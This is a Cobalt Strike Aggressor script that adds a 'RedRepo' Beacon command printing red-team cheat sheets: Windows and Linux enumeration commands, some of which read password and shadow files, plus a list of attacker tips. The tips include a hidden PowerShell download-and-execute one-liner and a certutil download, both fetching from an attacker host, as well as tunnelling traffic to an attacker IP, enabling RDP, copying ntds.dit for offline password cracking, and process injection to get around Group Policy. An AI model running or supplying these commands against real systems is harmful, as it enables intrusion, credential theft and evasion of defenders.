#RedTeamRepo #Author: @r3dqu1nn #A Common Repository for when you forget your RTFM and no googles. #https://www.sock-raw.org/wiki/doku.php/start - @ithilgore #http://pwnwiki.io/#!index.md #https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ #This script will be continuously updated. Any input or feedback is welcomed!! Enjoy and happy hacking! beacon_command_register("RedRepo", "A large repository of commands and red team tips", "\nSyntax: RedRepo [Option]\n" . "\nList Options: RedRepo [List]\n" . "\nDisplays well known commands for an OS, or diplays great tips or tricks for a Red Team Operator.\n"); alias RedRepo { if ($2 ismatch 'List') { local('$out'); #blog($1, "\c0\n\nRepo Options\n============"); $out = "RedRepo Options\n"; $out .= " \c0===============\n\n"; $out .= " Option Description\n"; $out .= "\c0 ------ -----------\n"; blog($1, $out); blog2($1, "\cBWindows Windows Enumeration Commands"); blog2($1, "\cBLinux Linux Enumeration Commands"); blog2($1, "\cBTips Red Team Tips"); blog2($1, "\cBList List of Options"); blog2($1, "\cBSmile Happy Hacking!\n"); } if ($2 ismatch 'Windows') { blog($1, "\t\c4====== Common Windows Commands ======\n"); #WMIC Commands blog($1, "\t\c4====== WMIC Enumeration Commands ======\n"); blog2($1, "\t\cBwmic computersystem get Name,domain,NumberofProcessors,Roles,totalphysicalmemory"); blog2($1, "\t\cBwmic desktop get Name,ScreenSaverActive,Wallpaper"); blog2($1, "\t\cBwmic netlogin get Caption,Privileges,UserID,UserType,NumberOfLogons,PasswordAge,LogonServer,Workstations"); blog2($1, "\t\cBwmic process get CSName,Description,ExecutablePath,ProcessId"); blog2($1, "\t\cBwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName"); blog2($1, "\t\cBwmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace"); blog2($1, "\t\cBwmic netuse list full"); blog2($1, "\t\cBwmic startup get Caption,Command,Location,User"); blog2($1, "\t\cBwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version"); blog2($1, "\t\cBwmic qfe get HotFixID,InstalledOn"); blog2($1, "\t\cBwmic ntdomain list"); blog2($1, "\t\cBwmic bios [list full]\n"); blog($1, "\t\c4====== Info Harvesting ======\n"); #Host Enumeration blog2($1, "\t\cBsysteminfo"); blog2($1, "\t\cBsysteminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\""); blog2($1, "\t\cBSET"); blog2($1, "\t\cBipconfig /all"); blog2($1, "\t\cBroute print"); blog2($1, "\t\cBarp -a"); blog2($1, "\t\cBnetstat -ano | findstr /I listening"); blog2($1, "\t\cBnetstat -ano | findstr /I established"); blog2($1, "\t\cBnbtstat -A *target IP*"); blog2($1, "\t\cBnslookup"); blog2($1, "\t\cBreg query [key]"); blog2($1, "\t\cBGet-ItemProperty [key] (PowerShell)"); blog2($1, "\t\cBschtasks /query /fo LIST /v"); blog2($1, "\t\cBsc query"); blog2($1, "\t\cBsc qc [service name]"); blog2($1, "\t\cBtasklist /SVC (/S Remote Computer)"); blog2($1, "\t\cBDRIVERQUERY"); blog2($1, "\t\cBRun C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config"); blog2($1, "\t\cBgpresult /z"); blog2($1, "\t\cBwhoami /all"); blog2($1, "\t\cBnetsh firewall show conf"); blog2($1, "\t\cBnetsh wlan show profiles"); blog2($1, "\t\cBnetsh advfirewall show allprofiles\n"); blog($1, "\t\c4======= Net Commands =======\n"); #Old School Net Commands blog2($1, "\t\cBnet accounts [/domain]"); blog2($1, "\t\cBnet group \"groupname\" [/domain]"); blog2($1, "\t\cBnet localgroup \"groupname\" [/domain]"); blog2($1, "\t\cBnet view [/domain]"); blog2($1, "\t\cBnet session"); blog2($1, "\t\cBnet share"); blog2($1, "\t\cBnet user [/domain]"); blog2($1, "\t\cBnet user [username] [/domain]"); blog2($1, "\t\cBnet use * \\\\IP\\C$ /user:username [password]"); blog2($1, "\t\cBUse the built in net commands with Beacon! [help net]\n"); } if ($2 ismatch 'Linux') { blog($1, "\t\c4====== Common Linux Commands ======\n"); blog($1, "\t\c4====== Info Harvesting/Host/Network Enumeration ======\n") blog2($1, "\t\cBcat /etc/issue"); blog2($1, "\t\cBcat /etc/*-release"); blog2($1, "\t\cBcat /etc/*-release | grep -E '\"NAME=\"|ID|VERSION|ID_LIKE'"); blog2($1, "\t\cBcat /proc/version"); blog2($1, "\t\cBrpm -q kernel"); blog2($1, "\t\cBdmesg | grep Linux"); blog2($1, "\t\cBls /boot | grep vmlinuz-"); blog2($1, "\t\cBlsb_release -a"); blog2($1, "\t\cBlast -a"); blog2($1, "\t\cBuname -a"); blog2($1, "\t\cBuname -mrs"); blog2($1, "\t\cBid"); blog2($1, "\t\cBhistory"); blog2($1, "\t\cBarp -a"); blog2($1, "\t\cBnetstat -anot"); blog2($1, "\t\cBps -elf"); blog2($1, "\t\cBps -elf | grep root"); blog2($1, "\t\cBls -la /var/www/html/"); blog2($1, "\t\cBservice apache2 status"); blog2($1, "\t\cBcat /etc/resolv.conf"); blog2($1, "\t\cBcat /etc/networks"); blog2($1, "\t\cBiptables -L"); blog2($1, "\t\cBiptables -L -t nat"); blog2($1, "\t\cBlsof -i"); blog2($1, "\t\cBcat /etc/services"); blog2($1, "\t\cBgrep 80 /etc/services"); blog2($1, "\t\cBw"); blog2($1, "\t\cBroute -n"); blog2($1, "\t\cBcat /etc/passwd"); blog2($1, "\t\cBcat /etc/passwd | awk -F : '{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}'"); blog2($1, "\t\cBcat /etc/motd"); blog2($1, "\t\cBcat /etc/group"); blog2($1, "\t\cBcat /etc/shadow\n"); } if ($2 ismatch 'Tips') { blog($1, "\t\c4====== Red Team Tips ======\n"); #Red Tips blog2($1, "\t\cBhttps://github.com/vysec/RedTips (If you have InterWebs)"); blog2($1, "\t\cBhttps://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt (InterWebs Required)"); blog2($1, "\t\cBNeed a map of the network? Run Bloodhound!! https://github.com/BloodHoundAD/BloodHound"); blog2($1, "\t\cBAlways check sysvols!! Domain Controllers will have them, you'll be surprised how some are still viewable by normal users."); blog2($1, "\t\cBnet user a specific user and see if they are executing any logon scripts, those might contain juicy information."); blog2($1, "\t\cBAlways check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind."); blog2($1, "\t\cBFind those Fileservers! Sysadmins leave behind all kinds of goodies there."); blog2($1, "\t\cBUse a Windows 7 workstation to tunnel your traffic natively. netsh int portproxy v4tov4 listenport=[port] connecthost=[AttackerIP] connectport=[port]"); blog2($1, "\t\cBUse certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine."); blog2($1, "\t\cBThe all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))\""); blog2($1, "\t\cBUse tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine."); blog2($1, "\t\cBEnable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f"); blog2($1, "\t\cBPlease wrap/encode/pack your payloads if you have to drop to disk!"); blog2($1, "\t\cBTry to stay in memory and avoid putting files on disk."); blog2($1, "\t\cBLive off the land!! Use what is on the target, native windows binaries are very powerful!"); blog2($1, "\t\cBUse AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis."); blog2($1, "\t\cBEnterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!"); blog2($1, "\t\cBInvoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking."); blog2($1, "\t\cBHave multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations."); blog2($1, "\t\cBcmd.exe and powershell.exe blocked by GPO? Find a process that's user owned and started on bootup for process injection to bypass that."); blog2($1, "\t\cBJust because you acquired initial access doesn't mean you stop doing recon. Network/Host Enumeration is always the most important part."); blog2($1, "\t\cBInvoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker."); blog2($1, "\t\cBNeed a Temporary web server? Use Python! python -m SimpleHTTPServer [port]\n"); } if ($2 ismatch 'Smile') { local('$smile'); $smile = "\n"; $smile .= "\t\c9░░░░░░░░░░░███████░░░░░░░░░░░\n"; $smile .= "\t\c9░░░░░░░████░░░░░░░████░░░░░░░\n"; $smile .= "\t\c9░░░░░██░░░░░░░░░░░░░░░██░░░░░\n"; $smile .= "\t\c9░░░██░░░░░░░░░░░░░░░░░░░██░░░\n"; $smile .= "\t\c9░░█░░░░░░░░░░░░░░░░░░░░░░░█░░\n"; $smile .= "\t\c9░█░░████░░░░░░░░██████░░░░░█░\n"; $smile .= "\t\c9█░░█░░░██░░░░░░█░░░░███░░░░░█\n"; $smile .= "\t\c9█░█░░░░░░█░░░░░█░░░░░░░█░░░░█\n"; $smile .= "\t\c9█░█████████░░░░█████████░░░░█\n"; $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n"; $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n"; $smile .= "\t\c9█░░░████████████████████░░░░█\n"; $smile .= "\t\c9░█░░░█▓▓▓▓▓▓▓▓█████▓▓▓█░░░░█░\n"; $smile .= "\t\c9░█░░░░█▓▓▓▓▓██░░░░██▓██░░░░█░\n"; $smile .= "\t\c9░░█░░░░██▓▓█░░░░░░░▒██░░░░█░░\n"; $smile .= "\t\c9░░░██░░░░██░░░░░░▒██░░░░██░░░\n"; $smile .= "\t\c9░░░░░██░░░░███████░░░░██░░░░░\n"; $smile .= "\t\c9░░░░░░░███░░░░░░░░░███░░░░░░░\n"; $smile .= "\t\c9░░░░░░░░░░█████████░░░░░░░░░░\n"; blog($1, $smile); } if ($2 is $null) { berror($1, "\c4Need to specify additional syntax! Use the 'List' command for help"); blog($1, "\cBSyntax Example: CommandRepo Windows"); } }